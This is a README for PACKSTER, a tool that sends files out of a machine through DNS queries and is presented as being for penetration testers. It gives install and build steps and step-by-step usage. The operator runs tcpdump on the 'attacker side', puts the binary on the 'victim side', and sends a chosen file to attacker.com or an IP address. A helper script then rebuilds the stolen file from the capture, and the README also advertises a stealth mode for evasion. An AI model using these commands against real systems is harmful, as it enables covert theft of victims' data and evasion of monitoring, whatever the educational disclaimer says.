PACKSTER is a powerful exfiltration tool designed for demonstrating efficient data exfiltration and security testing. It allows for controlled and stealthy data exfiltration by utilizing DNS queries, making it a valuable tool for cybersecurity professionals and penetration testers.
- Fast and reliable data exfiltration
- Supports multiple transport methods
- Customizable payload handling
- Stealth mode for evasion techniques
- Logging and error handling for debugging
Ensure you have Python installed on your system. PACKSTER requires Python 3.x.
git clone https://github.com/Sayan690/packster.git
cd packster
Get The Release Binaries
OR
Requirements - pyinstaller
git clone https://github.com/Sayan690/packster.git
cd packster
pyinstaller -F packety.py --icon=resources/packster.ico
pip install -r requirements.txt
To run PACKSTER, follow these steps:
- Start the listener on the attacker side
tcpdump -i any -w capture.pcap
- Transfer the packster binary to the victim side and execute
.\packster.exe -f C:\Path\To\File -a attacker.com
./packster.exe -f /Path/To/File -a 10.10.10.10
- After the process exits printing "done.", exit out from tcpdump, and run
filtrz.py
python3 filtrz.py -a attacker.com -c capture.pcap -o output_file_name.txt
PACKSTER is intended for educational and security testing purposes only. The author is not responsible for any misuse of this tool.
Developed by Sayan Ray @BareBones90
This project is licensed under the MIT License - see the LICENSE file for details.